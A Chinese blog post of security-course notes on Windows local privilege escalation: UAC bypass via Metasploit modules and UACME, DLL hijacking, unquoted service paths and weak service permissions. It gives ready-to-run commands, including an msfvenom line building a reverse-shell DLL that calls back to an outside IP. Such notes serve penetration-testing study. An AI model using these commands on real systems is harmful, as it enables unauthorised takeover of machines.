首页 > 系统相关 >Windows本地用户提权(二)

Windows本地用户提权(二)

时间:2023-03-18 16:45:39浏览次数:55  
标签:exe Windows dll DLL 提权 windows 本地用户 com

BypassUAC提权

MSF模块

UAC:用户控制机制

windows 7:

use exploit/windows/local/bypassua
get system

windows 10:

方法一:use exploit/windows/local/ask  \钓鱼攻击,需要管理员在win10上点击确定
方法二:use exploit/windows/local/bypassuac_sluihijack
方法三:use exploit/windows/local/bypassuac_silentcleanup

UACME 项目

https://github.com/hfiref0x/UACME

Akagi64.exe 41 msf1.exe   \Akagi64.exe 编号 调用执行(在被攻击主机上执行) 41数字可替换,常见23 61 41
getsystem  (在MSF上执行)

DLL劫持提权

提前信息收集相关第三方软件及DLL问题程序,本地调试成功后覆盖DLL实现利用

过程:信息收集-进程调试-制作dll并上传-替换dll-启动应用后成功

检测: ChkDllHijack 火绒剑

项目:https://github.com/anhkgg/anhkgg-tools

利用火绒剑进行进程分析加载DLL,一般寻找程序DLL利用。

msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117  lport=4444 -f dll -o xiaodi.dll

引号路径提权

服务路径如果不带引号:空格以后的会被当作参数,不再是一个整体

如何寻找不带引号的服务路径:

可以利用的路径需要满足的条件:不含引号+含有空格

检测语句:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

不安全的服务提权

检测脚本:accesschk PowerUp(PowerSploit)

1、accesschk.exe -uwcqv "administrators" *

2、Import-Module .\PowerUp.ps1

   Invoke-All Checks

https://github.com/411Hall/JAWS

https://github.com/PowerShellMafia/PowerSploit

sc config "test" binpath="C:\Program.exe"

sc start test

标签:exe,Windows,dll,DLL,提权,windows,本地用户,com
From: https://www.cnblogs.com/arongsec/p/17231136.html

相关文章